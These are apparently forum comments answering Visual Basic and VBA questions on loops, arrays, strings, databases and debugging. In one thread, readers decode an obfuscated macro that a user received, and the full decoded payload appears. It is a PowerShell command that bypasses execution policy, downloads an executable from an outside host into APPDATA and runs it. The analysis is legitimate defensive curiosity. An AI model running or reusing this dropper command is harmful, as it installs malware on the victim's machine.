This will make things very simple for you: https://github.com/sheetsync/NCalc/wiki
What have you tried so far? Any code? Pseudo code even? To complete the assignment, you need: * A counter for the number of loop iterations (a variable) * A way to hold 3 dices values (more variables) * A way to generate random values between 1 and 6. (Look up VBA's Rnd() function) * The condition for exiting the loop (how do you express all dices are equal?) 
Your code is 270 lines and its hard to work out what its doing. I would suggest finding out what section of your code is causing your problem and asking for more specific advice on that section. 
That should work. Just make a progress class for all your progress logic then add a collection of progress objects to your project class. Something like: List(of string, progressObj) where the string would be the name of the task. I've never used VBA but I assume it works the same as VB.Net.
I think you've got these assignments turned around: num1 = num5 num1 = num2 num5 = num2 num5 = num2 // you're saving num2's value in num5 num2 = num1 // make the switch num1 = num5 // set num1's value to what num2 used to be
tHIS TRIGGERED ME GREATLY I WISH I KNEW THIS BEFORE I STARTED :(((((((((((((((( thankyou.. doing a whole restructure tonight hahaa
Thanks!
you'd use a string array, which is not nearly as elegant. vba is really almost nothing like vb.net
you can have instances of other classes as vars in a class. this should all be doable. but instead of externally doing Project1.art.progress = project1.art.progress + 3, make art of have a progressAdd() method that takes the amount, adds it to the class var, and does the done check. that way it's automatic and you can't forget it check it. 
I looked at it and you can't change the values in a collection? Why? You might as well not even have collections.
This example has bad class names imho. It should be PET and DOG (Not plural). If you wanted a PETS class that could have multiple dogs you could use a property like "Dogs As List(Of Dog)" to have more than one.
I think you have to copy the item out, change it, and overwrite it back into the collection. keep in mind that VBA was made as a macro language based on classic VB (VB3 i think) and expanded on from there. it's really quite limited.
Thanks. So many different ways to tackle issues... it's hard to even know where to start. I appreciate the guidance
One of those "get it done quick" tools like VB6 rather than a fully fleshed out solution. I automate Word and Excel with VB.Net at my job, you would think it wouldn't be too hard to port that into a scripting language for Office. But then again I have no knowledge about that.
pluging .net into office would be awesome, they've already done it for SqlServer and it's pretty great. it does open some new security and deployment issues though.
&gt; I am trying to recreate the code in VB in VB what? there no such thing as just "VB" if you want a string representation of the unicode you'll need to loop the characters and concat each one. this is not a normal thing to do.
The "expected output" in your comment is just the input with each character expressed as a Unicode escape sequence, which is pointless because they're all just ASCII digits anyway. It's literally the identical string of numbers just written in a more verbose way. "converting string to unicode" doesn't really make sense. You can encode a string as bytes according to various character encodings with `Encoding.GetBytes`, but that's clearly not what you want. There is no way to answer your question without knowing how the original string is obfuscated. What is the original VBA or JS code that successfully does the conversion?
Hm I see, sorry I don't fully understand the toys I'm playing with here. I'd rather not share the entire code because I believe it is malicious but the code I am trying to replicate is VBA and basically looks like this: Public Function convert(numberString As String) numberString = StrConv(numberString, vbUnicode) convert = Split(Left(numberString, Len(numberString) - 1), vbNullchar) End Function I retyped that from memory so it might not be exactly correct but I am pretty sure it close. Ultimately, I just want to understand what this macro does that was sent to me because I thought it would be fun but it's turning out to be very confusing.
That's probably not the last step of the conversion process. To be honest, I'm not sure how the old VB string functions actually work. I assume that `StrConv(string, vbUnicode)` gives you an array of UTF16/UCS bytes. UTF16 is a two byte per character encoding, but since the input are all ASCII characters the upper byte of every character will be unused (zero). Then the code splits the resulting array at every null char. Because of the way ASCII/UTF-16 works, this should effectively be the same as `Encoding.ASCII.GetBytes(string)`. But that alone doesn't bring you any closer to decoding the output. The fact that the `vbUnicode` constant is 64 is unimportant, the parameters are just a set of bit flags (1, 2, 4, 8, ...).
Okay you seem extremely knowledgeable so I'm gonna just share this with you and hope you can understand it and maybe explain it to me, or at least give me the concepts I need to understand and I can learn it on my own. I understand if you don't care to read this and I appreciate your help thus far! This is what happens after that string is converted Function concise(originalNumberString As String) As String Dim res As String Dim converted As Variant converted = convert(Trim(originalNumberString)) For i = 0 To Len(originalNumberString) Dim extension As String If (i + 1) &lt;= UBound(converted) Then extender = converted(i) + extender(i + 1) i = i + 1 res = res + join(Int(extender)) End If Next concise = res End Function And the join function is Function join(anarchy As Integer) As string Dim worker() As Variant worker = Array("=", "O", "r", " ", "h", "x", "C", "B", "M", "f", "S", "D", "T", "+", ";", "n", "F", "?", "N", "d", "'", ")", "i", "\", "(", "g", "W", ".", "z", "E", "j", "b", "t", "X", "w", "l", "c", "-", "A", "p", "a", "H", "P", "o", "u", ",", "y", ":", "e", "s", "m", "$", "v", "/") Dim i As integer For i = LBound(worker) To UBound(worker) If i = anarchy Then join = worker(i) End If Next End Function 
So all this really does in a very roundabout game is split the numbers into groups of two digits, use those numbers number as indexes in the `worker` array, and concatenate those into a complete string. So `"365019..." -&gt; worker(36) + worker(50) + worker(19) ... = "cmd..."` The final result is cmd.exe /c powershell -Exec Bypass -NoP -Command (New-Object System.Net.WebClient).DownloadFile('http://njandhasdnppp.com/nino/undere.mdf', $env:APPDATA + '\XzFmaefMH.exe'); Start-Process $env:APPDATA'\XzFmaefMH.exe'; (New-Object System.Net.WebClient).DownloadString('http://njandhasdnppp.com/s.php?id=undere');
i wouldn't too much about the convert, it's just to handle email encoding nonsense. it's probably not even needed for this use. the rest is just indexed obfuscation. the loop in concise() pulls off 2 digits at a time (not the way i'd do it, but I guess it works) and the join function uses that as an index to pull a character from the worker array (also not the way I'd do it). this code is all efficient and probably done that way just to make it look more complex and harder to understand. so using the number string from the original post, the first 2 letters are "cs". 
Sorry for the late response. That did it for me! I appreciate it. Now, do you have any idea how to filter out the spaces as far as counting the letters goes? As of right now I’m filtering out the ASCII value for it, which does the same thing as just setting a variable equal to the string of a space. It counts the instances of that and is SUPPOSED to subtract that from the total string length but it isn’t working quite right. Thanks again. 
So to determine whether the character is a letter or not, you would need to separate out the text into characters and either use a function like `Char.IsLetter` or check the range of the character after converting using `Asc`. For your current code, you're taking `Asc` of the entire textbox text rather than a character. Also, I think you flipped the signs on 90 and 65. Some pseudo code: Loop through sentence until end Get character at current index If character is letter count += 1 End If End Loop
Well thanks for the help. I really appreciate it!
You should be able to .Format the return value. Shipping(shipcost, large, xlarge, sdxl).tostring("c") * this is air code, but should work.
the .Text property is a string. += is a math function. You cant perform math functions on a string variable. You'll have to store the numeric value that you want to display in Label3 in a variable, do the math on the variable, and then update the label.text property.
There are several of such systems out there and Microsoft ClickOnce is an okay tool the I often use. I would suggest that you do a simple MD5-hash check to compare files. 
Thanks I will give it a try. 
 label3.text = int(label3.text) +=1
After reading about it I would rather just write up my own system. So when I rebuild the game and upload it to the server how do I create the hash table? Do I create it before hand? Will the server do this for me? Because I think it's a lot of working to go through 10 gigs worth of files and generate a hash. And let's say I download the hash table and the client goes through and hashes its own files and compare it to the servers hash table, how will the client know what file to download and it's location from a hash? For example let's say "CGFSJIVDH-737-JYG" is a hash, just roll with it. The let's say the server has a folder structure like this: MainFolder/Folder1, Folder2, Folder3 Folder1/DataFolder Folder2/ManagedFolder Folder3/ShadersFolder So if there is a file in MainFolder/Folder3/ShadersFolder named gekko.shader then how will the client know to download that certain file and its location from the server from a hash?
If you're going to do this, I would suggest that you have some sort of a root folder where all your solutions are located. Like root/programA, root/ProgramB etc. You will probably need some sort of a server to do stuff behind the scene to maintain the order - depending on the extend of your needs you could implement some sort of an interface where you upload your program and then the behind service figures out where to put the new files. Like if you have some sort of a program blueprint-file in your solution folder and upload the folder the service can grab that blueprint-file to save it correctly and maintain the versioning. It would probably require some sort of a database to store your location data etc. When you deploy your client program it will have to call this service and ask if there's any updates. I think it might be good idea to think of your solution as one whole - like don't just update a single file but update the entire client all the time even if only one file has another MD5-hash. It would make it slightly easier and you only have to keep track on solutions instead of files in the entire solution. So the service behind will have to keep some sort of a signature for one file that speaks for the entire solution - might be the .exe-file. Above is only my own quick thoughts. I probably would end up with a different product along the progress if it was me making such application. Still I would suggest you to find existing solutions - people are saying great things about something called squirrel (https://github.com/Squirrel/Squirrel.Windows). I'm considering looking into this myself just to get rid of the annoying stuff that comes with ClickOnce.
would that one need to be **Cint** bonejob? label3.text = Cint(label3.text) +=1 
Thanks for the information.
Probably better than int but in this case, meh. I guess of you wanted to take it to what we are really supposed to do its integer.parse or int32.parse.
Yeh. I was just wondering wether I was doing summat wrong because I always use cint or cstr etc. Sorry. Not a criticism.. merely question. Thanks :)
No worries man, we are all here to figure this crap out.
Thank you all for your help!
In the project's compilation settings, either set it to target x64 for disable "prefer 32-bit".
You are probably running it as a 32-bit process which is[ limited to 2GB.](https://msdn.microsoft.com/en-us/library/system.outofmemoryexception\(v=vs.110\).aspx)
Already done. Still crashing. :-/
I found this: "You are attempting to create a large array in a 64-bit process. By default, the common language runtime does not allow single objects whose size exceeds 2GB. To override this default, you can use the configuration file setting to enable arrays whose total size exceeds 2 GB." Perhaps my pathfinding is building an array that's too large. How do I adjust the configuration file?
https://docs.microsoft.com/en-us/dotnet/framework/configure-apps/file-schema/runtime/gcallowverylargeobjects-element
I think you should look at optimizing your code versus just allowing it to gobble up endless amounts of RAM. If a single object that is running a path finding routine (for a game?) is using up 2GB of RAM, there sounds to be some major performance and optimization problems with the code itself.
Works great Thanks
Compile as 64 bit or make sure you don't have dirty loops.
Microsoft SQL Server is free up to 12GB. It's the best. Period.
...oh, you said logins. Use Microsoft Active Directory.
You wanted the database to run at a specific location or in the cloud? SQL Azure offers cloud based hosting services for SQL through Microsoft, but it isn't free. You can install SQL Express at a location. If it is multiple clients connecting to a database you plan to run from your own location, you would need to setup a static IP or a dynamic DNS to make the connections work, and deal with all the security involved with running a database with ports open on your firewall.
Many web hosting companies include SQL with the windows hosting packages. 
why don't you use a mysql solution? It's free and there are resources for visual studio. Or like other people said, SQL Server Express is free.
Really?
Yes, but you gave so little info on your project that it would be very hard to explain how.
so basically I have a picture of the human body that I would have buttons on different parts so that when the user clicks on it they get to see various videos of work outs
Yes, really. It's not just the DB that makes it great, it's also the management and developers tools. Plus, it integrates with Visual Studio so you can design your tables from Visual studio. Plus, no drivers to install. Plus it can link into any other form of flat file or DB so long as you find an ODBC driver - this is called "Linked servers" 
Currently on the couch so no Visual Studio. But I take it's the 'is uppercase' that troubling you. The answer is simple: https://msdn.microsoft.com/en-us/library/9s91f3by(v=vs.110).aspx?cs-save-lang=1&amp;cs-lang=vb#code-snippet-1 
Assuming within the same workbook thisworkbook.worksheets("Stocks") will get you to the data on the sheet. From there you can use the .range or .cells to get to the information within the cells. The MSDN articles for those are pretty good and can give you the syntax of how to use them. 
You never even use your "taxes" variable, so how should this even work?
I figured it out
By default, your "[Option Compare](https://docs.microsoft.com/en-us/dotnet/visual-basic/language-reference/statements/option-compare-statement)" setting is set to "binary" unless you set it otherwise. So, the idea would be to iterate through the individual characters in the string and compare each character to UCase(character) and see if they match using a binary compare. If they do, the character is upper case.
There are plenty of different ways to do this. Here's one. Sub Main() Dim sSrc As String = "Visual BasiC" Dim FirstUpper As String = "" Dim LastUpper As String = "" For Each c As System.Char In sSrc If Char.IsUpper(c) Then FirstUpper = c Exit For End If Next For Each c As System.Char In sSrc.ToCharArray.Reverse If Char.IsUpper(c) Then LastUpper = c Exit For End If Next Debug.Print(FirstUpper &amp; "" &amp; LastUpper) End Sub 
Did you Google it?
Yes. 
Fun with Linq: Sub Main Dim s = "Visual BasiC" Dim sUC = s.Where(Function(c) Char.IsUpper(c)) ' get upper cased letters Console.WriteLine($"{sUc.First} {sUC.Last}") ' Outputs "V C" End Sub 
Looks like you're not assigning both .text properties. Maybe try this? Dim rand as new Random Dim rand1 as INT = rand.next (100, 500) Dim rand2 as INT = rand.next (100, 500) lblrand1.text = rand1.ToString () lblrand2.Text = rand2.ToString()
A single textbox could be used to add numbers to a listbox. Just like your issues with the inputbox, you would still need to ensure that an integer is being added before adding it. (integer.TryParse()). I hate the inputbox but I know classes teach the use of it and sometimes require it so I'll just state that there are ways to determine if the input is valid. You could also just use a numericupdown control and only allow it to increment/decrement by 1. This ensures a numeric value is being added without the extra checks. From there you would then just iterate the data in the listbox to get your 3 values.
We only need to use integers for our program, although I believe with what you've suggested it may be quite easy to adapt it for singles. Thanks for the advice, I'll try it out and see what could be improved/changed.
Since you don't know how many numbers you'll have, you can do a loop and exit it when a specific condition occurs. Otherwise, you keep accumulating the integers in a list: Dim lst = New List(Of Integer) Do Dim input = InputBox("Leave empty or click ""Cancel"" when done","Enter an integer") If input = "" Then Exit Do Dim num As Integer If Integer.TryParse(input, num) Then lst.Add(num) Loop ' Do something with the numbers in the list... MsgBox("Here are your numbers: " &amp; String.Join(", ", lst)) 
No need, I have scoured the internet for bits of code, and have adapted it to fit my needs. I now have a textbox for manually typing the numbers into( could've used a key pad but no need for it) and I have a button which adds the number to the listbox. When the average nutton is clicked, the numbers are placed in ascending order (a nice detail) and the mean is worked out.
I'm looking at this on the phone so excuse me if it's incorrect. I don't see you actually getting the txtResult to the value for reault. Instead of returning result, set the txtResult instead.
Thanks I tried that and by the time I posted this I found the what might be the real problem. It looks like my if else statement just defaults to the else since it won't grab the "+" unless I'm doing that part wrong. 
Think about this: if you enter an operator of "+" then what is the value of (Not "+" = "/"). It's true, right? You would be much better off testing for valid operators rather than invalid ones. 
It's because anything you put in other than the first operator (+) will trigger a true result so it will instantly show the warning... I read it in my head like this... If &lt;enteredvalue&gt; is not '+' then throw error.. then If &lt;enteredvalue&gt; is not '-' then throw error.. then etc etc If you do the check yourself.. obviously putting in anything other than + will throw error.. You need to run the check considering all 4 operators before deciding the result.. at the moment you are doing one at a time
Update here is what I have so far. The message boxes are to see what values they currently are. So far nothing is getting passed in. I need help with these strings to work and the values. Also it defaults to the else statement of course. [image] (https://imgur.com/fcmlgYM) and [image2] (https://imgur.com/U03cZ14)
Thanks for the help!
Thanks for the help!
thank you sooo much! they are displaying correctly. now i need to fix my loop 
Handy reference for you instead of all those else ifs. https://docs.microsoft.com/en-us/dotnet/visual-basic/language-reference/statements/select-case-statement
you probably need a loop, but it's unclear how what you want correlates to that code. this is the basic process toremove=105 do while toremove &gt; 0 if cell.value &lt; toremove then toremove = toremove - cell.value cell.value = 0 cell = cell +1 else cell.value = cell.value - toremove toremove = 0 end if loop 
Can I assign a TextBox to "toremove"? Because the amount to be removed won't always be the same. Thanks a lot for your reply tho. It has been a HUGE help.
Could you further explain. I thought having them equal the textbox pulld the value in? Unless I'm wrong about that
what you are doing here is setting the Text property of the textbox to whatever the operator/operand is, so nothing in that case. You want it the other way round. Also you want to set it before you pass it on to the function. It would work in that case but it defeats the purpose of passing a value to a function.
Sure, just read the textbox's value, ensure that it's numeric and set its value to toremove. An easy way to do this is with TryParse. Using the toremove variable as the successful storage variable when tested against the textbox's input.
a textbox value is basically a variable, so yes. I only meant to show the concept, you'll need to work out the syntax details. i don't do VBA much anyway.
Thanks for the help
LOL! Nice!
Hello again. I tried what you suggested and it worked far better than I expected. However, it's still not doing what I need. For example. If the value of the variable "toremove" is &gt; than the value of the cell, I need it to save the difference like... If toremove = 10 and the value of the cell is = 8, I need it to revmove 8 from that cell and the remaining 2 from the cell in the next row. Was I clear enough? Once again, thanks a lot for your help.
Am I going to need a domain for this? How would I get clients to connect to it?
When you declare the variable, just give it a value. Dim name As String = ""
Placeholders are a great way to educate the user and you can do it easily using the on click event of the textbox. Public Class Form2 Private Sub Form2_Load(sender As Object, e As EventArgs) Handles MyBase.Load TextBox1.Text = "Placeholder" End Sub Private Sub TextBox1_MouseClick(sender As Object, e As MouseEventArgs) Handles TextBox1.MouseClick If TextBox1.Text = "Placeholder" Then TextBox1.Text = "" End Sub End Class check the value of the textbox to see if is the default, if it is clear it. This way if it is modified the by the user it is not cleared.
That was what I was thinking of thank you, however what if the text box is something like full name and the user clicks, ‘Enter’ and just leaves the placeholder in there. Do you think it’s ok to do something like this in the enter code? If btnEnter.text = ‘watermark’ then Msgbox(‘Please enter a name’) Is that ok of is there an easier way such as if font is grey then msgbox(please enter a name) Thanks
Garbage Collector got your back fam, don't worry bout it. 
Once the last mine is gone, you'll just have an empty array. Which is fine, assuming you can create mines you'll just add a new one to the array. Having an empty array is fine no need to create a dummy entry for it.
It's good that you'er thinking of these issues now. Like the others mentioned it is really not a big deal. What can be a big deal is large number of objects stored in memory when not needed and to ".Dispose()" of objects if they have that method. The Garbage Collector will do that level of work for you. When you get started with bigger apps, then choices will need to be made: lower memory usage vs speed to get data (left in db or file system, for example)
So I just have to stop removing the mines if ubound(mines) = 0?
Correct. Perfect. The memory footprint of a small empty array is so minor... and if you were REALLY wanting low memory and/or faster then you would want C, Assembly or even written to a chip. VB/C# are many layers above all that so they are a little slower, but for business apps, games and many things .NET does a good job and you don't have to sweat the SMALL stuff. Good design choices will make your life and your apps life much better than worrying if you have an empty array. But again, good thinking.
Are you directly using an array? As in `Dim x As Mine(0 to 20)` I ask because in professional VB/C# programming I almost never see naked arrays. The vast majority of the time we use wrappers around arrays such as the `List(of Mine)` class. 
&gt; It's good that you'er thinking of these issues now. I'd like to echo that thought. I've met far too many "professional" programmers who think it's unfashionable to even understand how memory works, let alone pay attention to using it correctly.
Actually, it's an array of Mine objects which is a member of the World class. Dim MyWorld as World = New World Redim MyWorld.Mines(t) Dim MyWorld.Mines(i) as Mine = New Mine ...and so on. To delete them I just run through a loop. TotalMines -= 1 For i = n to TotalMines MyWorld.Mines(i) = MyWorld.Mines(i + 1) Next Redim Preserve MyWorld.Mines(TotalMines) If n is the last element, all you have to do is redim to size - 1. I was just wondering, when you get down to the very last mine, do you just leave it in or can you destroy the whole array? I guess you can't undimension a global array. Grand scheme of things, one array element isn't taking up much memory. And the odds of the player depleting all 200 mines are pretty slim. But I was just wondering, out of curiosity. 
 MyWorld.Mines.RemoveAt(n) If your goal is to learn programming, understanding raw arrays is a good thing to learn. But if you just want to get stuff done, List is your friend.
Agree completely. In .NET, arrays should really only exist when they are created with fixed length. Redimming an array is super old school, and super inefficient. Use generics; they'll make your life easier, your code cleaner, and everything faster and more efficient. 
:--|:--:|--: Membership Type| Total Monthly Purchase| Reward Points Basic| Less than 100| 0 |100-249.99| 5% of the total monthly purchase | 250 and over | 6% of the total monthly purchase Standard| less than 50 | 2% of the total monthly purchase |50 and over | 7% of the total monthly purchase Premium | less than 200| 7% of the total monthly purchase |200 and over | 9% of the total monthly purchase
Membership Type Total monthly purchase ($) Reward points Basic Less than 100 0 100-249.99 5% of the total monthly purchase 250 and over 6% of the total monthly purchase Standard Less than 50 2% of the total monthly purchase 50 and over 7% of the total monthly purchase Premium Less than 200 7% of the total monthly purchase 200 and over 9% of the total monthly purchase 
I think what they are trying to teach you is how to use "nested if statements". Which is to say, an if statement inside another if statement. Here is a partial solution: if level = "basic" then If points &lt; 100 Then discount = 0.0 Else if points &lt; 249.99 discount = 0.05 end else if level = "standard" then end You should be able to figure out the rest from here. 
Comboboxes as well as listsboxes contains items that consists of a string and object. If you make a class with two property items - one String and one Object and override the ToString to display the string-property you can basically insert such object into you combo or list box. Once the object is added to the list/combo you cannot change it while it's in the combo/list list. You'll have to find the item, remove it, edit it and reinsert it. 
TIL
Thank You! I think what I was doing was completely wrong. :) 
Internally, it does some nifty things. For example, it tracks how many items you have and how big the array is separately. Let's say the default size is 16. That means your new, empty List will say it has 0 items, but really it wraps an array that can hold 16. This means that it won't call `Redim Preserve` until you've added the 17th item to the list. Then you'll get another 16 spots. (I think it doubles in size each time, but don't quote me on that.) This can make it a lot faster than what you're doing. Especially if you are adding or removing items from the end of the list.
My pathfinding code uses lists. But I didn't know enough about how to use them when I started the main game engine. So it's all arrays of objects within objects. Kind of spaghetti-ish, but it's easier to debug things you fully understand than something you're still learning. 
Quick question, If I am using a radio button as (Basic) how should I get it calculated? when am I supposed to enter a number into the Textbox?
Check out [Kevin Drumm](https://www.youtube.com/channel/UCSX3MR0gnKDxyXAyljWzm0Q/playlists)'s channel on YouTube. The guy does very good tutorials of computer science concepts, and then sums it up with a visual basic implementation of the principles. I've been programming for 30 years, and I learned a few things from this guy. 
As long as it's a dumb mistake that's easily fixed. "Oh. I put = instead of +=. No wonder." If it's something in-depth and complicated, then I scream. 
Here's another way to do it Private Function getPassword(cb As Integer) As String Dim pw As String = "" For i = 1 To cb Select Case Rnd() * 3 Case 0 ' digits pw += Asc(Rnd() * 10 + 48) Case 1 'upper case alpha pw += Asc(Rnd() * 26 + 65) Case 2 ' lower case alpha pw += Asc(Rnd() * 26 + 97) End Select Next Return pw End Function
I had something similar where I had this broken for the better part of two years in a workbook I use daily. Finally fixed it using this technique about two weeks ago, I was just too lazy to fix it for all that time.
Put the repeating logic in a function; sub Action() If len(strFirstname) &gt; 0 then boolValid = fnValidate(strFirstname) else boolValid = False end if if boolValid = False then 'Failed first name If len(strFirstname) &gt; 0 then boolValid = fnValidate(strFirstname) else boolValid = False end if if boolValid = False then 'Failed second name end Sub function fnValidate(byval strInput as string) as boolean fnValidate = True 'Valid until proven otherwise For counter = 1 To Len(Secondname) NameLetter = Mid(Secondname, counter, 1) If not NameLetter Like "[a-z]" Then fnValidate = True Next end function 
Since you're doing the same check you could extract the check into a function and call your function and have it return a boolean. Function CheckName(ByVal Firstname As String, Secondname As String) As Boolean Return CheckName(Firstname) = CheckName(Secondname) End Function Function CheckName(name As String) As Boolean If name = "" Then Return False For Each letter In name If Not letter = " " Then If Not letter.ToString.ToLower Like "[a-z]" Then Return False End If End If Next Return True End Function If you call the above code with Debug.WriteLine(CheckName("peter") = CheckName("hansen")) ...you will get True Debug.WriteLine(CheckName("peter 2") = CheckName("hansen")) ...you will get False Debug.WriteLine(CheckName("peter") = CheckName("ha45nsen")) ...you will get False etc... 
The math and 2D visualization is pretty easily doable. Turning it into an interactive 3D thing is also possible (with WPF or 3D libraries), but not as simple as shown in that video.
Thank you :-)
Hahahhah I feel so stupid now that's dude 
Huh? 
Ah actually I remembered why I didn't do it your way. I need to have two separate message boxes. One saying that the first name is incorrect and the other saying that my second name is incorrect. Do you have another solution? 
Yeah. Shouldn't be a problem. But it's 0125 night here so I need some sleep. Tomorrow then!
that's should be what my logic does. maybe something in how you implemented it?
that should be what my logic does. maybe something in how you implemented it? 
"Hahahhah I feel so stupid now **thanks** dude"
Thanks! I figured it out tho... I’ll just have an if statement in a button click event eg. If checkname(firstname) = true then Specific error code If checkname(secondname) = false then Specific error code 
If anything, I believe it could do with being a little longer and more complicated. Yours, Cheryl-Anne O'Brien
Ok, Thanks now gotta go smack my head trying to figure out how to make this thing. :) 
&gt; No such host is known it seems your PCs DNS server doesn't recognize those hostnames.
If I ping them through CMD or access them via \\machinename\c$, it picks them up fine, same with Active Directory
ping and unc paths can use SMB for name resolution, this method only uses DNS. try nslookup.
[removed]
Why don't you just use 'OR' to put them all together? 
what don't you like about the links in the sidebar?
From what I can tell, I'm assuming you're displaying the results in the lstOutPut Listbox. I see where you've cleared the items in Get_Interest but not seeing where you're displaying the results (mounthlyInterest &amp; terms) by adding them to lstOutPut. 
You should probably be using lstBox2.AddItem (or whatever the proper method is) to add "state". Also, based on how I understand your goal, you do not want to "Exit For".
did not see that lol, my b, thanks! :)
I don't see VB out in the wild. Mainly hobbyist developers. BUT if you're comfortable learning it, you'll absolutely gain from it. The transition to C# (which is more popular between the 2) is relatively simple, too. I hope that in 80 hours, the course goes further than just VB and actually goes in to more topics like best practices, SOLID principles, architectural decisions, etc. This knowledge is transferable across languages and frameworks (probably with a few exceptions) so another win.
SOLID? Bah. Just do whatever you were going to do anyways and call it SOLID. That's what everyone does in industry. Learning real principles such as the .NET Framework Design Guidelines, that's the ticket. 
Yes. 1. It will be easy for you to learn, as you already know the older version. 2. It will allow you to start using .NET without having to also learn a new programming language at the same time. 3. Once you are ready to transition to C#, you'll already know .NET so again it will be easier. 4. You can do pretty much anything with VB that you could with C#, though long term C# jobs are easier to find and tend to pay more. That said, do you really need a course? Chances are it will be a waste of time and you'll regret not just buying a book and working on your own time/pace.
In that case, just call it Agile. Ha.
&gt; I don't see VB out in the wild. You can still find it in the financial sector, especially in older companies that transitioned from VB 6. That said, it is rarer and rare each year.
Pretty much yea. Once in a rare while I see people actually try to follow SOLID. Invariably it is such a disaster that most people think it's a joke post. 
It'd at least help with interviews.
Unfortunately that's true.
Yeah, that is correct. I don't know how to display the results properly. If the user enters a 4 year term, then the program should return 48 calculations. I need a loop, but don't know how to use one to achieve this. 
Thank you. Yes, the exit for was left over from another code I tried. 
Can you explain the formula? In pseudocode if possible.
One advantage of this training is the certification i will get. I can put it in my resume. But yeah, learning on my own really works for me just like how i learned VBA and the basics of SQL and Python (a bit)
Yes. I did the same thing. Started my career using vba. Then learned vb.net as a programmer analyst. I rebuilt everything I did with vba and coded it with vb.net. it's much faster and easier to code when you get the hang of it. I like alot better than vba. And you'll get the hang of it quickly coming from vba. I have read alot about vb vs c÷. It all comes down to personal preference. People who say either one is better are full of it. It literally compiles to the same dlls. 
Honestly, a certification for VB probably isn't worth the paper is printed on. Unless your current employer really wants you to have it, I seriously doubt that anyone else will.
Thank you! I'll just watch tutorial videos then. 
I say this as someone who loves VB: if you are a pro you need to learn C#. The differences in job availability and pay is too great to only know VB. If you aren't a pro, then hell yea VB is the way to go. Does all the same things using a much easier syntax. 
Well to each their own. I don't love vba fell into it. Also I make more than my counter who knows c#. 
The only real difference between C# and VB is that C# has bad grammar and punctuation. I'm fluent in VB because I speak English. I muddle through C# when I have to.
A sub returns no value and a procedure returns a value. Those are the only thing that separates the two.
I'm talking in generalities. If you have a good job using it... well congratulations. 
 Sub WhatAreYou_s(ByRef sResults As String) sResults = "I am a Sub-routine" End Sub Function WhatAreYou_f() As String Return "I am a Function" End Function 
This sound true, I wonder if it is... A sub can be a callback or a thread, a function can not.
User enters the principal, terms, and annual interest rate. So if the users enters a principal = 10,000, a term = 4, and an annual interest rate = 0.072 then it displays the monthly payment = $240.39 and the total number of payments = 48 in this case. In a list box, it then shows each month by breaking it down into what amount of that $240.39 is principal and what amount is interest. So for the first month it would be principal = 180.39 and the interest would be 60.00. Does that make sense? 
&gt; I am having trouble When asking for a solution of a problem, you should also at least mention what the problem actually is.
i did tho.. after that i said, "when attempting to pass an array from one function into another functions parameter." is that not enough? thanks
That is only your intention, what you wanted to do. You did not say what did not work during that process. Your commented line &gt; 'What would i type in here to get the FULL array into my other function. with "full" in upper case indicates that you are merely not able to pass the full array. So what is it now? Are there errors during debugging? If not the whole part of the array gets passed, which part of it is affected? etc.
 dim myList() as integer = ReverseNumbers(Seperatecardnumbers()) if you just want to reverse the FullCardNumber Dim revFullCardNunber As integer = cint(StrReverse(FullCardNumber.ToString))) The way you are doing it is way to much work. 
A sub accepts arguments/parameters but doesn't return a value. It's a block of code used to "do" something. A function accepts arguments and parameters but is used to return a value. They are useful for if you want to reuse code and not have your sub procedures bloated.
If the replace value is solely used in the code (i.e. select 'disaster' but treat it as 'foo' down the road in the code, why not use hidden fields? Let's just say you define a datatable as having the following three columns: cbo_ID 'an int cbo_Display 'a string, this is where "disaster" would be cbo_Alt_Value 'a nullable string (or just default it to empty, whatever floats your boat) in the events you could leverage the cbo.selectedvalue property to access the underlying datatable (you did use it as the datasource right?) to retrieve the cbo_Alt_Value string (don't forget to protect against an empty replacement value) by, (and may syntax may be slightly off, but something like...) dim replace_value as string = If dt_CBO_Datasource.rows(cbo.selectedvalue)("cbo_Alt_Value").tostring.length&gt;0, dt_CBO_Datasource.rows(cbo.selectedvalue)("cbo_Alt_Value").tostring else cbo.selectedtext.tostring (you may not be able to one line that along with the declaration, but as far as it goes, give it a whirl). Alternatively, there are extensions out there and quite possibly tutorials, to convert the stock winforms combobox (2 column, 1 hidden) to a multicolumn combobox. 
I know I'm a week late on this one but here is my input: in the click event(btn_Calculate_Click I think) you've reversed the assignments of the "text" values to the variables passed to the eventual function (should be operand1 = txtOperand1.text etc) you've also declared the result variable in the event as an integer, while the function called returns a decimal. Fun fact: If you have option strict off in your environment (as it appears you do), the compiler will automatically try to force the datatype returned to fit in the called datatype. but if you explicitly do this conversion (say, msgbox(cint(12.31)) which is effectively the same you'll get 12, since 12 is an integer as you declared above. If option strict was on, a build error would have occurred as you were trying to implicitly (not explicitly) convert data types, by returning a decimal data type result to an integer data type. As far as the function goes that does the calculation, the parameter assignment to textboxes doesn't seem necessary at all regardless of fixing the above assignment issue, also, the return call itself is sufficient, the repeated exit function calls are not required, since return well, returns. the final thing i would look at is the final statement in the function, and handle invalid entries better somehow, maybe by setting the return value to nothing, and handling it on return (since you've chosen on returning decimal, if returning string, you have 'NaN' available) 
Again I know I'm late responding to this one, but, I'm having fun so, there's that. ok, so as the previous comments are correct about how it's failing, they are all not mentioning two things: 1) .net has something even better than OR, it has ORELSE as well both have their purposes, but in this case you could do something like (and the exact syntax may be off but) if useroperator isnot nothing andalso useroperator &lt;&gt;"" andalso (useroperator = "+" orelse....) note how it works from worst case errors to lesser errors This should protect against most input errors 2) ORELSE and it's twin sister ANDALSO fix a problem with the base OR and AND in that it works sequentially (left to right in the statement), so, if correctly structured (handle the invalid information first, then orelse/andalso ) you drop LOTS of input validation functions for the simple stuff (like a variable is nothing(null), or empty) Alternatively, in this case, instead of a sequence of if..elseif..elseif.. statements you could/should use a SELECT CASE statement That one i'll leave for y'all to google/stackoverflow
Thanks for the nice and super well thought out reply ! I did end up figuring it out earlier. I am debating on turning on the strict mode lol.
Are you sure the buttons are actually inside the groupbox and not behind it? Right-Click on the groupbox in the designer and select "Send to Back" do the buttons show up when you do this? If so, they are not actually in the groupbox. Move them away from that area to somewhere else on the form and then drag them back into the groupbox so that they area actually contained within it. If this is not the case, could you show us a visual of what exactly is happening?
 For Each obj as Control in GroupBox1.Controls obj.Visible = True Next This loops through all the controls contained within the groupbox (container) and sets each of their visible properties to True.
So as I understand it, you have 3 variables * principal (p) = 10000 * terms (t) = 4 * annual interest rate (a) = .072 Where did **240.39** come from? How did you get **180.39** and **60.00**? I really think that if you can verbalize (or type out) the algorithm you'll have better luck solving the problem yourself! Try again to relay how to find the solution.
